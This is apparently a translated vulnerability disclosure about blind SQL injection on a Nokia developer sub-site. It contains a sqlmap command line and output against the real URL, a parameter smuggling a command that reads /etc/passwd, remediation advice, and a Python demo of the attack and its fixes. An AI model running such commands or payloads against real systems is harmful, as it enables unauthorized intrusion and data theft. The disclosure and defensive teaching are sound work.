SQL injection on a Nokia sub-site exposes 1,620 tables and roughly 400,000 records.
Found with a batch vulnerability scanner I built; this is the initial scan.
Really useful.
I did not dump the actual records, only the table names.
Going for a high score.
Injection point:
python sqlmap.py -u "http://developer.qt.nokia.com/ows-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|" --tables --thread 3
[15:08:58] [INFO] resuming back-end DBMS 'oracle'
[15:08:58] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_id=1) AND 7908=7908 AND (4640=4640&file=|cat /etc/passwd|
---
[15:08:59] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
Sensitive data
Solution:
Use pre-compiled (prepared) SQL statements with bound parameters instead of building the query by string concatenation.
In addition, validate parameters at the access interface: user_id should only be accepted when it is a plain integer, so a value like "1) AND 7908=7908 AND (4640=4640" is rejected before it reaches the database.
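The following is an added example, not code from the report or from the Nokia site, showing both what the sqlmap finding above means and what the fix looks like. It assumes an in-memory SQLite table as a stand-in for the Oracle backend (the real schema is not on the page) and mirrors the query shape that the ") AND ... AND (" payload implies: the user_id value dropped into a parenthesised WHERE clause. The true/false payload pair is how boolean-based blind injection reads one bit per request; the parameterized query and the integer filter are the two fixes from the Solution section.

```python
import re
import sqlite3

# Boolean-based blind payload pair in the shape sqlmap reported for user_id.
# TRUE_PAYLOAD is the payload from the report; FALSE_PAYLOAD is a constructed
# counterpart that flips one comparison, which is what lets a blind attacker
# tell a true page from a false page.
TRUE_PAYLOAD = "1) AND 7908=7908 AND (4640=4640"
FALSE_PAYLOAD = "1) AND 7908=7909 AND (4640=4640"


def setup_db():
    """Constructed in-memory SQLite table standing in for the Oracle backend
    (assumption: the real table layout is not on the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the parameter lands inside a parenthesised WHERE
    clause, which is exactly what the ') AND ... AND (' payload closes and
    reopens. The page content now depends on the injected comparison."""
    sql = "SELECT name FROM users WHERE (user_id=" + user_id + ")"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Bound parameter: the value is sent separately from the SQL text, so the
    whole payload is compared as one literal and never parsed as SQL."""
    sql = "SELECT name FROM users WHERE (user_id=?)"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def validate_user_id(raw):
    """Interface-level filter from the Solution section: accept only a plain
    decimal integer and return it as int; anything else returns None."""
    if re.fullmatch(r"[0-9]{1,10}", raw) is None:
        return None
    return int(raw)


def safe_lookup(conn, raw):
    """Filter first, then bind: rejected input never reaches the database."""
    user_id = validate_user_id(raw)
    if user_id is None:
        return []
    return lookup_parameterized(conn, user_id)


if __name__ == "__main__":
    conn = setup_db()
    # The vulnerable query answers the attacker's question (true -> row, false -> no row).
    print("vulnerable, true payload :", lookup_vulnerable(conn, TRUE_PAYLOAD))
    print("vulnerable, false payload:", lookup_vulnerable(conn, FALSE_PAYLOAD))
    # The bound parameter compares the payload as a literal and finds nothing.
    print("parameterized            :", lookup_parameterized(conn, TRUE_PAYLOAD))
    # The filter rejects the payload outright and still serves a normal id.
    print("validated + bound        :", safe_lookup(conn, TRUE_PAYLOAD), safe_lookup(conn, "1"))
```

The filter uses a full-match regular expression rather than int(), because Python's int() also accepts leading whitespace, a sign and underscores, none of which an id in a query string should carry. Oracle bind variables behave the same way as the SQLite placeholder here: the value is never concatenated into the statement text.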